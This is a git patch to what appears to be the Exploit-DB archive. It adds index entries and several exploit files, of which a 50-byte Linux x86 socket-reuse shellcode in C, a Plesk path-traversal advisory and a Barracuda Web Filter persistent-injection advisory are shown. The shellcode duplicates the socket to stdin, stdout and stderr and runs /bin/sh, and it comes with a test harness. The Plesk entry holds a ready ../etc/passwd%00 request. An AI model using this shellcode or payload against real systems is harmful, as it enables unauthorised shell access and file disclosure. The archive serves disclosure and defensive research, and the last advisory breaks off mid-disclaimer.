From 857d210af18bfc912ef3e35b532434d53614cc55 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Thu, 24 Jul 2014 04:40:20 +0000
Subject: [PATCH] Updated 07_24_2014

---
 files.csv                            |  17 +
 platforms/lin_x86/shellcode/34060.c  |  66 ++++
 platforms/multiple/remote/34136.txt  |   7 +
 platforms/multiple/webapps/34148.TXT | 444 +++++++++++++++++++++++++++
 platforms/php/webapps/34038.txt      |  53 ++++
 platforms/php/webapps/34137.txt      |   7 +
 platforms/php/webapps/34138.txt      |   7 +
 platforms/php/webapps/34139.txt      |   9 +
 platforms/php/webapps/34140.txt      |  10 +
 platforms/php/webapps/34141.txt      |   9 +
 platforms/php/webapps/34142.txt      |  10 +
 platforms/php/webapps/34144.txt      |   9 +
 platforms/php/webapps/34146.txt      |  11 +
 platforms/php/webapps/34147.txt      |   9 +
 platforms/unix/dos/34145.txt         |   7 +
 platforms/windows/local/34131.py     | 226 ++++++++++++++
 platforms/windows/remote/34059.py    | 118 +++++++
 platforms/windows/remote/34143.txt   |   9 +
 18 files changed, 1028 insertions(+)
 create mode 100755 platforms/lin_x86/shellcode/34060.c
 create mode 100755 platforms/multiple/remote/34136.txt
 create mode 100755 platforms/multiple/webapps/34148.TXT
 create mode 100755 platforms/php/webapps/34038.txt
 create mode 100755 platforms/php/webapps/34137.txt
 create mode 100755 platforms/php/webapps/34138.txt
 create mode 100755 platforms/php/webapps/34139.txt
 create mode 100755 platforms/php/webapps/34140.txt
 create mode 100755 platforms/php/webapps/34141.txt
 create mode 100755 platforms/php/webapps/34142.txt
 create mode 100755 platforms/php/webapps/34144.txt
 create mode 100755 platforms/php/webapps/34146.txt
 create mode 100755 platforms/php/webapps/34147.txt
 create mode 100755 platforms/unix/dos/34145.txt
 create mode 100755 platforms/windows/local/34131.py
 create mode 100755 platforms/windows/remote/34059.py
 create mode 100755 platforms/windows/remote/34143.txt

diff --git a/files.csv b/files.csv
index c3df5efb0..cae38e15a 100755
--- a/files.csv
+++ b/files.csv
@@ -30657,6 +30657,7 @@ id,file,description,date,author,platform,type,port
 34034,platforms/asp/webapps/34034.txt,"cyberhost 'default.asp' SQL Injection Vulnerability",2010-05-22,redst0rm,asp,webapps,0
 34035,platforms/php/webapps/34035.sjs,"OpenForum 2.2 b005 'saveAsAttachment()' Method Arbitrary File Creation Vulnerability",2010-05-23,"John Leitch",php,webapps,0
 34037,platforms/win32/local/34037.txt,"OpenVPN Private Tunnel Core Service - Unquoted Service Path Elevation Of Privilege",2014-07-12,LiquidWorm,win32,local,0
+34038,platforms/php/webapps/34038.txt,"Aerohive HiveOS 5.1r5 - 6.1r5 - Multiple Vulnerabilities",2014-07-12,DearBytes,php,webapps,0
 34040,platforms/php/webapps/34040.txt,"razorCMS 1.0 'admin/index.php' HTML Injection Vulnerability",2010-05-24,"High-Tech Bridge SA",php,webapps,0
 34041,platforms/php/webapps/34041.txt,"GetSimple CMS 2.01 'components.php' Cross Site Scripting Vulnerability",2010-05-24,"High-Tech Bridge SA",php,webapps,0
 34042,platforms/php/webapps/34042.txt,"RuubikCMS 1.0.3 'index.php' Cross Site Scripting Vulnerability",2010-05-24,"High-Tech Bridge SA",php,webapps,0
@@ -30676,6 +30677,8 @@ id,file,description,date,author,platform,type,port
 34056,platforms/php/webapps/34056.txt,"Joomla! 1.5.x Multiple Modules 'search' Parameter Cross-Site Scripting Vulnerabilities",2010-05-28,"Riyaz Ahemed Walikar",php,webapps,0
 34057,platforms/php/webapps/34057.txt,"wsCMS 'news.php' Cross Site Scripting Vulnerability",2010-05-31,cyberlog,php,webapps,0
 34058,platforms/multiple/dos/34058.txt,"DM Database Server 'SP_DEL_BAK_EXPIRED' Memory Corruption Vulnerability",2010-05-31,"Shennan Wang HuaweiSymantec SRT",multiple,dos,0
+34059,platforms/windows/remote/34059.py,"Kolibri WebServer 2.0 - GET Request SEH Exploit",2014-07-14,"Revin Hadi Saputra",windows,remote,0
+34060,platforms/lin_x86/shellcode/34060.c,"Socket Re-use Shellcode for Linux x86 (50 bytes)",2014-07-14,ZadYree,lin_x86,shellcode,0
 34062,platforms/php/webapps/34062.txt,"Shopizer 1.1.5 - Multiple Vulnerabilities",2014-07-14,"SEC Consult",php,webapps,80
 34063,platforms/hardware/remote/34063.rb,"D-Link info.cgi POST Request Buffer Overflow",2014-07-14,metasploit,hardware,remote,80
 34064,platforms/hardware/remote/34064.rb,"D-Link HNAP Request Remote Buffer Overflow",2014-07-14,metasploit,hardware,remote,80
@@ -30735,7 +30738,21 @@ id,file,description,date,author,platform,type,port
 34128,platforms/hardware/webapps/34128.py,"MTS MBlaze Ultra Wi-Fi / ZTE AC3633 - Multiple Vulnerabilities",2014-07-21,"Ajin Abraham",hardware,webapps,80
 34129,platforms/windows/dos/34129.txt,"World Of Warcraft 3.3.5a (macros-cache.txt) - Stack Overflow",2014-07-21,"Alireza Chegini",windows,dos,0
 34130,platforms/linux/webapps/34130.rb,"Raritan PowerIQ 4.1.0 - SQL Injection Vulnerability",2014-07-21,"Brandon Perry",linux,webapps,80
+34131,platforms/windows/local/34131.py,"Microsoft XP SP3 - BthPan.sys Arbitrary Write Privilege Escalation",2014-07-21,KoreLogic,windows,local,0
 34132,platforms/php/remote/34132.txt,"IBM GCM16/32 1.20.0.22575 - Multiple Vulnerabilities",2014-07-21,"Alejandro Alvarez Bravo",php,remote,443
 34133,platforms/linux/dos/34133.txt,"Apache 2.4.7 mod_status Scoreboard Handling Race Condition",2014-07-21,"Marek Kroemeke",linux,dos,0
 34134,platforms/lin_amd64/local/34134.c,"Linux Kernel ptrace/sysret - Local Privilege Escalation",2014-07-21,"Vitaly Nikolenko",lin_amd64,local,0
 34135,platforms/windows/dos/34135.py,"DjVuLibre <= 3.5.25.3 - Out of Bounds Access Violation",2014-07-22,drone,windows,dos,0
+34136,platforms/multiple/remote/34136.txt,"Plesk Server Administrator (PSA) 'locale' Parameter Local File Include Vulnerability",2010-06-21,"Pouya Daneshmand",multiple,remote,0
+34137,platforms/php/webapps/34137.txt,"Joomla! 'com_videowhisper_2wvc' Component Cross Site Scripting Vulnerability",2010-06-10,Sid3^effects,php,webapps,0
+34138,platforms/php/webapps/34138.txt,"VideoWhisper PHP 2 Way Video Chat 'r' Parameter Cross Site Scripting Vulnerability",2010-06-14,Sid3^effects,php,webapps,0
+34139,platforms/php/webapps/34139.txt,"Yamamah Photo Gallery 1.00 'download.php' Local File Disclosure Vulnerability",2010-06-13,mat,php,webapps,0
+34140,platforms/php/webapps/34140.txt,"AneCMS 1.x 'modules/blog/index.php' HTML Injection Vulnerability",2010-06-11,"High-Tech Bridge SA",php,webapps,0
+34141,platforms/php/webapps/34141.txt,"AneCMS 1.x 'modules/blog/index.php' SQL Injection Vulnerability",2010-06-11,"High-Tech Bridge SA",php,webapps,0
+34142,platforms/php/webapps/34142.txt,"MODx 1.0.3 'index.php' Multiple SQL Injection Vulnerabilities",2010-06-14,"High-Tech Bridge SA",php,webapps,0
+34143,platforms/windows/remote/34143.txt,"XnView <= 1.97.4 - MBM File Remote Heap Buffer Overflow Vulnerability",2010-06-14,"Mauro Olea",windows,remote,0
+34144,platforms/php/webapps/34144.txt,"Joomla! 'com_easygb' Component 'Itemid' Parameter Cross Site Scripting Vulnerability",2010-06-08,"L0rd CrusAd3r",php,webapps,0
+34145,platforms/unix/dos/34145.txt,"Python <= 3.2 'audioop' Module Memory Corruption Vulnerability",2010-06-14,haypo,unix,dos,0
+34146,platforms/php/webapps/34146.txt,"Sell@Site PHP Online Jobs Login Multiple SQL Injection Vulnerabilities",2010-06-15,"L0rd CrusAd3r",php,webapps,0
+34147,platforms/php/webapps/34147.txt,"JForum 2.1.8 'username' Parameter Cross Site Scripting Vulnerability",2010-06-06,"Adam Baldwin",php,webapps,0
+34148,platforms/multiple/webapps/34148.TXT,"Barracuda Networks #35 Web Firewall 610 6.0.1 - Filter Bypass & Persistent Vulnerability",2014-07-23,Vulnerability-Lab,multiple,webapps,0
diff --git a/platforms/lin_x86/shellcode/34060.c b/platforms/lin_x86/shellcode/34060.c
new file mode 100755
index 000000000..c2a657313
--- /dev/null
+++ b/platforms/lin_x86/shellcode/34060.c
@@ -0,0 +1,66 @@
+/* Socket Re-use Combo for linux x86 systems by ZadYree -- 50 bytes
+ * <zadyree@tuxfamily.org>
+ *
+ * Made using sockfd trick + dup2(0,0), dup2(0,1), dup2(0,2) +
+ * execve /bin/sh
+ *
+ * Thanks: Charles Stevenson, ipv, 3LRVS research team
+ *
+ * gcc -o socket_reuse socket_reuse.c -z execstack
+ */
+
+char shellcode[]= /* We use sys_dup(2) to get the previous attributed sockfd */
+"\x6a\x02"      // push 0x2
+"\x5b"          // pop ebx
+"\x6a\x29"      // push 0x29
+"\x58"          // pop eax
+"\xcd\x80"      // int 0x80 -> call dup(2)
+"\x48"          // dec eax
+/* Now EAX = our Socket File Descriptor */
+
+"\x89\xc6"      // mov esi, eax
+
+/* dup2(fd,0); dup2(fd,1); dup2(fd,2); */
+"\x31\xc9"                  // xor    %ecx,%ecx
+"\x56"                      // push   %esi
+"\x5b"                      // pop    %ebx
+// loop:
+"\x6a\x3f"                  // push   $0x3f
+"\x58"                      // pop    %eax
+"\xcd\x80"                  // int    $0x80
+"\x41"                      // inc    %ecx
+"\x80\xf9\x03"              // cmp    $0x3,%cl
+"\x75\xf5"                  // jne    80483e8 <loop>
+
+/* execve /bin/sh by ipv */
+"\x6a\x0b"                  // push byte 0xb
+"\x58"                      // pop eax
+"\x99"                      // cdq
+"\x52"                      // push edx
+"\x31\xf6"                  // xor esi, esi - We add those instructions
+"\x56"                      // push esi     - to clean up the arg stack
+"\x68\x2f\x2f\x73\x68"      // push dword 0x68732f2f
+"\x68\x2f\x62\x69\x6e"      // push dword 0x6e69922f
+"\x89\xe3"                  // mov ebx, esp
+"\x31\xc9"                  // xor ecx, ecx
+"\xcd\x80";                 // int 0x80
+;
+
+/* 
+
+shellcode[]=
+"\x6a\x02\x5b\x6a\x29\x58\xcd\x80\x48\x89\xc6"
+"\x31\xc9\x56\x5b\x6a\x3f\x58\xcd\x80\x41\x80"
+"\xf9\x03\x75\xf5\x6a\x0b\x58\x99\x52\x31\xf6"
+"\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
+"\x89\xe3\x31\xc9\xcd\x80";
+
+*/
+
+
+int main(void)
+{
+  printf("Shellcode length: %d\n", strlen(shellcode));
+  (*(void(*)()) shellcode)();  
+  return 0;
+}
diff --git a/platforms/multiple/remote/34136.txt b/platforms/multiple/remote/34136.txt
new file mode 100755
index 000000000..fa897cb06
--- /dev/null
+++ b/platforms/multiple/remote/34136.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/40813/info
+
+Plesk Server Administrator (PSA) is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.
+
+https://www.example.com/servlet/Help?system_id=pem&book_type=login&help_id=change_password&locale=/../../../../../../etc/passwd%00 
\ No newline at end of file
diff --git a/platforms/multiple/webapps/34148.TXT b/platforms/multiple/webapps/34148.TXT
new file mode 100755
index 000000000..b5153d4ea
--- /dev/null
+++ b/platforms/multiple/webapps/34148.TXT
@@ -0,0 +1,444 @@
+Document Title:
+===============
+Barracuda Networks #35 Web Firewall 610 v6.0.1 - Filter Bypass & Persistent Vulnerability
+
+
+References (Source):
+====================
+http://www.vulnerability-lab.com/get_content.php?id=1101
+
+
+Barracuda Networks Security ID (BNSEC): BNSEC-2361
+http://www.barracuda.com/kb?id=501600000013m4O
+
+Solution #00006619
+BNSEC-02361: Authenticated persistent IVE in Barracuda Web Filter v6.0.1
+
+
+Release Date:
+=============
+2014-07-22
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+1101
+
+
+Common Vulnerability Scoring System:
+====================================
+3.7
+
+
+Product & Service Introduction:
+===============================
+The Barracuda Web Filter is an integrated content filtering, application blocking and malware protection solution that is powerful, 
+easy to use and affordable for businesses of all sizes. It enforces Internet usage policies by blocking access to Web sites and 
+Internet applications that are not related to business, and it easily and completely eliminates spyware and other forms of malware 
+from your organization. No more costly staff time lost repairing infected computers.
+
+( Copy of the Vendor Homepage: https://www.barracuda.com/products/webfilter )
+
+
+Abstract Advisory Information:
+==============================
+The Vulnerability Laboratory Research Team discovered multiple persistent input validation web vulnerabilities and a filter bypass issue in 
+the Barracuda Networks WebFilter 610-Vx appliance web-application.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2013-12-27:	Researcher Notification & Coordination (Benjamin Kunz Mejri)
+2013-12-28:	Vendor Notification (Barracuda Networks Security Team - Bug Bounty Program)
+2014-01-19:	Vendor Response/Feedback (Barracuda Networks Security Team - Bug Bounty Program)
+2014-07-15:	Vendor Fix/Patch (Barracuda Networks Developer Team) [Coordination: Dave Farrow]
+2014-07-22:	Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+Barracuda Networks
+Product: WebFilter Appliance Web-Application 6.0.1.009 - X210 X310 X410 X510 X610 X710 X810 X910 X1010
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Medium
+
+
+Technical Details & Description:
+================================
+Multiple persistent input validation web vulnerabilities and a filter bypass has been discovered in the Barracuda Networks WebFilter Model 610Vx appliance web-application.
+The vulnerability allows remote attackers to inject own malicious script codes on the application-side of the affected service, module or function.
+
+The vulnerability are located in the  `domain names`, `grid__data in grid_columns` and `x-grid3-cell-inner x-grid3-col-name` 
+values of the `Basic > Reports` module. Remote attackers are able to inject own script code as domain name to execute the 
+context in the show advanced options menu listing (+plus). The attack vector is persistent located on the application-side 
+and the request method to inject is POST.
+
+To bypass the invalid domain exception the attacker first need to include a valid domain, in the second step he change the domain name value by a 
+session tamper. Reason behind the technique is that the input field validation is separatly done to the request method validation. The restriction 
+of the invalid input field check can be bypassed by usage of a session tamper to change the input field context live after the first direct input 
+encode of the web filter application. Another problem is located in the same module which affects the buttom name item listing.
+
+The security risk of the persistent input validation web vulnerability and fitler bypass is estimated as medium with a cvss (common vulnerability scoring 
+system) count of 3.7. Exploitation of the persistent web vulnerability requires low user interaction and a local low privileged web-application account. 
+Successful exploitation of the vulnerability results in session hijacking (customers), persistent phishing, persistent external redirects or persistent 
+manipulation of connected or affected module context.
+
+
+Request Method(s):
+				[+] GET
+				[+] POST
+
+Vulnerable Module(s):
+				[+] Basic > Reports > Advanced Options > Show Advanced Options
+
+Vulnerable Input Field(s):
+				[+] Add Domain
+
+Vulnerable Parameter(s):
+				[+] domain name
+				[+] grid__data in grid_columns
+				[+] x-grid3-cell-inner x-grid3-col-name
+
+Affected Module(s):
+				[+] Reports Module Index
+				[+] Reports Module Advanced Options List
+				[+] Buttom Name Item List
+
+Affected Version(s):
+				[+] All versions > Web-Filter applicance web-application
+
+
+Proof of Concept (PoC):
+=======================
+The persistent input validation web vulnerability can be exploited by remote attackers with a low privileged web-application user account and low or medium 
+user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
+
+
+--- PoC Session Logs Request/Response Input Execution ---
+
+Status: 200[OK]
+GET https://webfilter.ptest.localhost:6317/cgi-mod/index.cgi?auth_type=Local&et=1380375181&locale=en_US&password=70be67622c59f4862ed9e7bc6a7cc3d2&primary_tab=BASIC&realm=&role=&secondary_tab=reports&user=guest 
+Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Content Size[160284] Mime Type[text/html]
+   Request Headers:
+      Host[webfilter.ptest.localhost:6317]
+      User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
+      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+      Accept-Language[en-US,en;q=0.5]
+      Accept-Encoding[gzip, deflate]
+      DNT[1]
+      Connection[keep-alive]
+      Cache-Control[max-age=0]
+   Response Headers:
+      Server[nginx/1.0.14]
+      Content-Type[text/html; charset=utf-8]
+      Connection[keep-alive]
+      Expires[Fri, 28 Sep 2012 13:22:20 GMT]
+      Date[Sat, 28 Sep 2013 13:22:20 GMT]
+      Content-Length[160284]
+
+
+15:22:11.590[793ms][total 793ms] Status: 304[Not Modified]
+GET https://webfilter.ptest.localhost:6317/css/calendar/calendar-win2k-cold-1.css?v=6.0.1.009 Load Flags[VALIDATE_ALWAYS ] Content Size[-1] Mime Type[application/x-unknown-content-type]
+   Request Headers:
+      Host[webfilter.ptest.localhost:6317]
+      User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
+      Accept[text/css,*/*;q=0.1]
+      Accept-Language[en-US,en;q=0.5]
+      Accept-Encoding[gzip, deflate]
+      DNT[1]
+      Referer[https://webfilter.ptest.localhost:6317/cgi-mod/index.cgi?auth_type=Local&et=1380375181&locale=en_US&password=70be67622c59f4862ed9e7bc6a7cc3d2&primary_tab=BASIC&realm=&role=&secondary_tab=reports&user=guest]
+      Connection[keep-alive]
+      If-Modified-Since[Tue, 23 Jul 2013 02:54:15 GMT]
+      Cache-Control[max-age=0]
+   Response Headers:
+      Server[nginx/1.0.14]
+      Date[Sat, 28 Sep 2013 13:22:21 GMT]
+      Last-Modified[Tue, 23 Jul 2013 02:54:15 GMT]
+      Connection[keep-alive]
+      Expires[Thu, 31 Dec 2037 23:55:55 GMT]
+      Cache-Control[max-age=315360000, public]
+
+
+15:22:11.590[794ms][total 794ms] Status: 304[Not Modified]
+GET https://webfilter.ptest.localhost:6317/css/autosuggest.css?v=6.0.1.009 Load Flags[VALIDATE_ALWAYS ] Content Size[-1] Mime Type[application/x-unknown-content-type]
+   Request Headers:
+      Host[webfilter.ptest.localhost:6317]
+      User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
+      Accept[text/css,*/*;q=0.1]
+      Accept-Language[en-US,en;q=0.5]
+      Accept-Encoding[gzip, deflate]
+      DNT[1]
+      Referer[https://webfilter.ptest.localhost:6317/cgi-mod/index.cgi?auth_type=Local&et=1380375181&locale=en_US&password=70be67622c59f4862ed9e7bc6a7cc3d2&primary_tab=BASIC&realm=&role=&secondary_tab=reports&user=guest]
+      Connection[keep-alive]
+      If-Modified-Since[Tue, 23 Jul 2013 02:54:15 GMT]
+      Cache-Control[max-age=0]
+   Response Headers:
+      Server[nginx/1.0.14]
+      Date[Sat, 28 Sep 2013 13:22:21 GMT]
+      Last-Modified[Tue, 23 Jul 2013 02:54:15 GMT]
+      Connection[keep-alive]
+      Expires[Thu, 31 Dec 2037 23:55:55 GMT]
+      Cache-Control[max-age=315360000, public]
+
+
+15:22:11.591[813ms][total 813ms] Status: 304[Not Modified]
+GET https://webfilter.ptest.localhost:6317/barracuda.css?v=6.0.1.009 Load Flags[VALIDATE_ALWAYS ] Content Size[-1] Mime Type[application/x-unknown-content-type]
+   Request Headers:
+      Host[webfilter.ptest.localhost:6317]
+      User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
+      Accept[text/css,*/*;q=0.1]
+      Accept-Language[en-US,en;q=0.5]
+      Accept-Encoding[gzip, deflate]
+      DNT[1]
+      Referer[https://webfilter.ptest.localhost:6317/cgi-mod/index.cgi?auth_type=Local&et=1380375181&locale=en_US&password=70be67622c59f4862ed9e7bc6a7cc3d2&primary_tab=BASIC&realm=&role=&secondary_tab=reports&user=guest]
+      Connection[keep-alive]
+      If-Modified-Since[Tue, 23 Jul 2013 02:54:15 GMT]
+      Cache-Control[max-age=0]
+   Response Headers:
+      Server[nginx/1.0.14]
+      Date[Sat, 28 Sep 2013 13:22:21 GMT]
+      Last-Modified[Tue, 23 Jul 2013 02:54:15 GMT]
+      Connection[keep-alive]
+      Expires[Thu, 31 Dec 2037 23:55:55 GMT]
+      Cache-Control[max-age=315360000, public]
+
+
+15:22:11.594[987ms][total 987ms] Status: 304[Not Modified]
+GET https://webfilter.ptest.localhost:6317/js/scriptaculous/scriptaculous.js?load=effects,dragdrop&v=6.0.1.009 Load Flags[VALIDATE_ALWAYS ] Content Size[-1] Mime Type[application/x-unknown-content-type]
+   Request Headers:
+      Host[webfilter.ptest.localhost:6317]
+      User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
+      Accept[*/*]
+      Accept-Language[en-US,en;q=0.5]
+      Accept-Encoding[gzip, deflate]
+      DNT[1]
+      Referer[https://webfilter.ptest.localhost:6317/cgi-mod/index.cgi?auth_type=Local&et=1380375181&locale=en_US&password=70be67622c59f4862ed9e7bc6a7cc3d2&primary_tab=BASIC&realm=&role=&secondary_tab=reports&user=guest]
+      Connection[keep-alive]
+      If-Modified-Since[Tue, 23 Jul 2013 02:54:14 GMT]
+      Cache-Control[max-age=0]
+   Response Headers:
+      Server[nginx/1.0.14]
+      Date[Sat, 28 Sep 2013 13:22:22 GMT]
+      Last-Modified[Tue, 23 Jul 2013 02:54:14 GMT]
+      Connection[keep-alive]
+      Expires[Thu, 31 Dec 2037 23:55:55 GMT]
+      Cache-Control[max-age=315360000, public]
+
+
+15:22:11.594[987ms][total 987ms] Status: 304[Not Modified]
+GET https://webfilter.ptest.localhost:6317/js/ext-prototype-adapter.js?v=6.0.1.009 Load Flags[VALIDATE_ALWAYS ] Content Size[-1] Mime Type[application/x-unknown-content-type]
+   Request Headers:
+      Host[webfilter.ptest.localhost:6317]
+      User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
+      Accept[*/*]
+      Accept-Language[en-US,en;q=0.5]
+      Accept-Encoding[gzip, deflate]
+      DNT[1]
+      Referer[https://webfilter.ptest.localhost:6317/cgi-mod/index.cgi?auth_type=Local&et=1380375181&locale=en_US&password=70be67622c59f4862ed9e7bc6a7cc3d2&primary_tab=BASIC&realm=&role=&secondary_tab=reports&user=guest]
+      Connection[keep-alive]
+      If-Modified-Since[Tue, 23 Jul 2013 02:54:14 GMT]
+      Cache-Control[max-age=0]
+   Response Headers:
+      Server[nginx/1.0.14]
+      Date[Sat, 28 Sep 2013 13:22:22 GMT]
+      Last-Modified[Tue, 23 Jul 2013 02:54:14 GMT]
+      Connection[keep-alive]
+      Expires[Thu, 31 Dec 2037 23:55:55 GMT]
+      Cache-Control[max-age=315360000, public]
+
+
+15:22:13.629[260ms][total 260ms] Status: 502[Bad Gateway]
+GET https://webfilter.ptest.localhost:6317/cgi-mod/x Load Flags[VALIDATE_ALWAYS ] Content Size[1789] Mime Type[text/html]
+   Request Headers:
+      Host[webfilter.ptest.localhost:6317]
+      User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
+      Accept[image/png,image/*;q=0.8,*/*;q=0.5]
+      Accept-Language[en-US,en;q=0.5]
+      Accept-Encoding[gzip, deflate]
+      DNT[1]
+      Referer[https://webfilter.ptest.localhost:6317/cgi-mod/index.cgi?auth_type=Local&et=1380375181&locale=en_US&password=70be67622c59f4862ed9e7bc6a7cc3d2&primary_tab=BASIC&realm=&role=&secondary_tab=reports&user=guest]
+      Connection[keep-alive]
+   Response Headers:
+      Server[nginx/1.0.14]
+      Date[Sat, 28 Sep 2013 13:22:23 GMT]
+      Content-Type[text/html]
+      Content-Length[1789]
+      Connection[keep-alive]
+
+
+
+
+--- PoC Session Logs Request/Response Delete Element Item Execution ---
+
+15:26:04.436[0ms][total 0ms] Status: pending[]
+GET https://webfilter.ptest.localhost:6317/js/adapters/prototype-adapter.js?v=6.0.1.009 Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
+   Request Headers:
+      Host[webfilter.ptest.localhost:6317]
+      User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
+      Accept[*/*]
+      Accept-Language[en-US,en;q=0.5]
+      Accept-Encoding[gzip, deflate]
+      DNT[1]
+      Referer[https://webfilter.ptest.localhost:6317/cgi-mod/index.cgi]
+
+
+15:26:04.436[0ms][total 0ms] Status: pending[]
+GET https://webfilter.ptest.localhost:6317/js/highcharts.js?v=6.0.1.009 Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
+   Request Headers:
+      Host[webfilter.ptest.localhost:6317]
+      User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
+      Accept[*/*]
+      Accept-Language[en-US,en;q=0.5]
+      Accept-Encoding[gzip, deflate]
+      DNT[1]
+      Referer[https://webfilter.ptest.localhost:6317/cgi-mod/index.cgi]
+
+
+15:26:04.461[0ms][total 0ms] Status: pending[]
+GET https://webfilter.ptest.localhost:6317/favicon.ico Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
+   Request Headers:
+      Host[webfilter.ptest.localhost:6317]
+      User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
+      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+      Accept-Language[en-US,en;q=0.5]
+      Accept-Encoding[gzip, deflate]
+      DNT[1]
+
+
+15:26:04.542[0ms][total 0ms] Status: pending[]
+GET https://webfilter.ptest.localhost:6317/js/scriptaculous/effects.js Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
+   Request Headers:
+      Host[webfilter.ptest.localhost:6317]
+      User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
+      Accept[*/*]
+      Accept-Language[en-US,en;q=0.5]
+      Accept-Encoding[gzip, deflate]
+      DNT[1]
+      Referer[https://webfilter.ptest.localhost:6317/cgi-mod/index.cgi]
+
+
+15:26:04.542[0ms][total 0ms] Status: pending[]
+GET https://webfilter.ptest.localhost:6317/js/scriptaculous/dragdrop.js Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
+   Request Headers:
+      Host[webfilter.ptest.localhost:6317]
+      User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
+      Accept[*/*]
+      Accept-Language[en-US,en;q=0.5]
+      Accept-Encoding[gzip, deflate]
+      DNT[1]
+      Referer[https://webfilter.ptest.localhost:6317/cgi-mod/index.cgi]
+
+
+15:26:04.964[454ms][total 454ms] Status: 200[OK]
+GET https://webfilter.ptest.localhost:6317/cgi-mod/header_logo.cgi?6.0.1.009 Load Flags[LOAD_NORMAL] Content Size[-1] Mime Type[image/gif]
+   Request Headers:
+      Host[webfilter.ptest.localhost:6317]
+      User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
+      Accept[image/png,image/*;q=0.8,*/*;q=0.5]
+      Accept-Language[en-US,en;q=0.5]
+      Accept-Encoding[gzip, deflate]
+      DNT[1]
+      Referer[https://webfilter.ptest.localhost:6317/cgi-mod/index.cgi]
+      Connection[keep-alive]
+   Response Headers:
+      Server[nginx/1.0.14]
+      Content-Type[image/gif]
+      Transfer-Encoding[chunked]
+      Connection[keep-alive]
+      Expires[Sat, 28 Sep 2013 13:26:14 GMT]
+      Date[Sat, 28 Sep 2013 13:26:14 GMT]
+      Cache-Control[no-cache, no-store]
+
+
+15:26:05.740[213ms][total 213ms] Status: 502[Bad Gateway]
+GET https://webfilter.ptest.localhost:6317/cgi-mod/x Load Flags[LOAD_NORMAL] Content Size[1789] Mime Type[text/html]
+   Request Headers:
+      Host[webfilter.ptest.localhost:6317]
+      User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
+      Accept[image/png,image/*;q=0.8,*/*;q=0.5]
+      Accept-Language[en-US,en;q=0.5]
+      Accept-Encoding[gzip, deflate]
+      DNT[1]
+      Referer[https://webfilter.ptest.localhost:6317/cgi-mod/index.cgi]
+      Connection[keep-alive]
+   Response Headers:
+      Server[nginx/1.0.14]
+      Date[Sat, 28 Sep 2013 13:26:15 GMT]
+      Content-Type[text/html]
+      Content-Length[1789]
+      Connection[keep-alive]
+
+
+
+Reference(s):
+https://webfilter.ptest.localhost:6317/cgi-mod/index.cgi?auth_type=Local&et=1380375181&locale=en_US&password=70be67622c59f4862ed9e7bc6a7cc3d2&primary_tab=BASIC&realm=&role=&secondary_tab=reports&user=guest
+
+
+Solution - Fix & Patch:
+=======================
+The vulnerability can be patched by a secure parse and encode of the input to add domains. Ensure that the application GET to POST requests are restricted and filtered 
+to prevent further attacks in the vulnerable add domains module section.
+
+
+Barracuda Networks Appliance: Advanced >Firmware Updates Page
+http://www.barracuda.com/kb?id=501600000013m4O
+
+
+Security Risk:
+==============
+The security risk of the persistent input validation web vulnerabilities and estimated as medium(+).
+
+
+Credits & Authors:
+==================
+Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, 
+either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
+Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
+profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
+states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
